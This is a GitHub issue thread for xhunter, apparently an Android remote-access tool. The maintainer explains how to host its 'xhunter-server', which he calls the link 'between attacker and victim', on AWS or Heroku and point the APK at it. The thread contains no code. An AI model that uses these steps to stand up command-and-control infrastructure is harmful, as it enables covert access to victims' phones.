### ISSUE TITLE
Custom Server

### ISSUE THREAD

**Issue by EJ3CT** [anirudhmalik/xhunter#21]
i can't understand how to setup custom server. i don't have any pc

**Comment by anirudhmalik** [comment]
@EJ3CT It doesn't require pc. 
see:
https://mobisoftinfotech.com/resources/mguide/launch-aws-ec2-server-set-ubuntu-16-04/
and to login to server use termux

**Comment by EJ3CT** [comment]
> @EJ3CT It doesn't require pc. 
> see:
> https://mobisoftinfotech.com/resources/mguide/launch-aws-ec2-server-set-ubuntu-16-04/
> and to login to server use termux
> 

i don't have any cradit card for open aws account 😔

**Comment by Attackndroid** [comment]
> @EJ3CT It doesn't require pc. see: https://mobisoftinfotech.com/resources/mguide/launch-aws-ec2-server-set-ubuntu-16-04/ and to login to server use termux

Do I have to start the reverse port forwarding in the terminal myself or will you do the app itself?

**Comment by anirudhmalik** [comment]
@Attackndroid No you don't have to use any terminal. There is option for custom server see ---> #18

**Comment by anirudhmalik** [comment]
# xhunter-server

xhunter-server is used to communicate between attacker and victim. It is very easy to host on [heroku](https://www.heroku.com/). follow the below steps:

#### Setup
- Signup and create a heroku account [here](https://signup.heroku.com)
- After login, click the below **Deploy** button.

   [![Deploy](https://www.herokucdn.com/deploy/button.svg)](https://heroku.com/deploy?template=https://github.com/anirudhmalik/xhunter-server)
 
 - Give your app a name `<your_app_name>` and click `Deploy app` button.
 - Wait for the process to complete. 
 - Once complete, Click `view app` and If you see `Welcome to Xhunter Backend Server!!` then you have successfully created your server.
 - Now use this url `https://<your_app_name>.herokuapp.com` in [xhunter_v1.5.apk](https://github.com/anirudhmalik/xhunter/releases/tag/v1.5).
